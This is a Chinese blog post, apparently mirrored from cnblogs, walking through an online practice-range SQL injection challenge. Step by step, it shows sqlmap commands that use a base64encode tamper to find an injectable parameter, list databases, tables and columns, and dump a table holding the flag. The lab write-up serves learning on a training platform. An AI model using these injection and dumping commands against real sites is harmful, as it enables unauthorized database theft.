码迷,mamicode.com
首页 > 数据库 > 详细

sqlmap--实战篇

时间:2020-07-07 23:37:02      阅读:118      评论:0      收藏:0      [点我收藏+]

标签:strong   火狐   利用   操作   通过   python   来讲   com   web安全   

------------恢复内容开始------------

最近闲来无事,发现一个在线靶场--墨者学院,本次实战就以此为平台,正好利用sqlmap跑一下,熟悉一下。

路径:墨者学院-->在线靶场-->web安全-->sql注入-->sql注入实战--MySQL

URL:http://219.153.49.228:48368/show.php?id=MQo=  

注:需要注册使用墨币购买后启动靶场才可进入页面

首界面

技术图片

 

 

 观察页面看出

  • 此次使用的数据库为mysql
  • key的值存储于colunmns中,这也是最后闯关成功的凭证吧

今天来讲两种方法来获取key,第一种是通过SQLmap自动化跑数据库。第二种,利用火狐浏览器中的hackbar来手工注入

 

【第一种】

 

  1. 先看这个URL:http://219.153.49.228:48368/show.php?id=MQo=   最后结尾是 id=MQo= ,一般来说id=后跟一个数字(例如sql-lib中),经过我查阅后发现这个MQo=是属于base64加密,具体可以自行百度了解。(这个MQo=就是1)
    技术图片
  2. 利用sqlmap 

    第一次我们没有加参数
    sqlmap返回信息显示:参数 id 可能不存在注入,可以尝试增加尝试等级(level),或者增加执行测试的风险(risk)。如果你觉得存在某种保护机制,可以使用tamper篡改注入数据。
    根据提示加入了level和tamper篡改注入数据。

    python sqlmap.py -u http://219.153.49.228:42868/show.php?id=MQo= --level=3 -tamper=base64encode
    

      可以看出数据库为MySQL

 技术图片

 

 

 接下来就是我们常规拖库的操作了

python sqlmap.py -u http://219.153.49.228:42868/show.php?id=MQo= --level=3 -tamper=base64encode -dbs

  【一共有两个数据库,当前数据库名为test】技术图片

 

 

 

python sqlmap.py -u http://219.153.49.228:42868/show.php?id=MQo= --level=3 --tamper=base64encode -D test -tables

  【爆出test下的表data】


技术图片

 

 

 

python sqlmap.py -u http://219.153.49.228:45162/show.php?id=MQo= --level=3 --tamper=base64encode -D test -T data -columns

  【结果显示】
表中显示有4列,而这个thekey所在列的值就是我们这关的答案了,接下来查询即可
技术图片

 

 

python sqlmap.py -u http://219.153.49.228:45162/show.php?id=MQo= --level=3 --tamper=base64encode -D test -T data -C id,main,thekey,title -dump

  【查询结果】

技术图片

 

 

【第二种】

第二种就是手工注入了,emmmm 相信通过你的努力一定可以的 (滑稽)

sqlmap--实战篇

标签:strong   火狐   利用   操作   通过   python   来讲   com   web安全   

原文地址:https://www.cnblogs.com/c1047509362/p/13185615.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!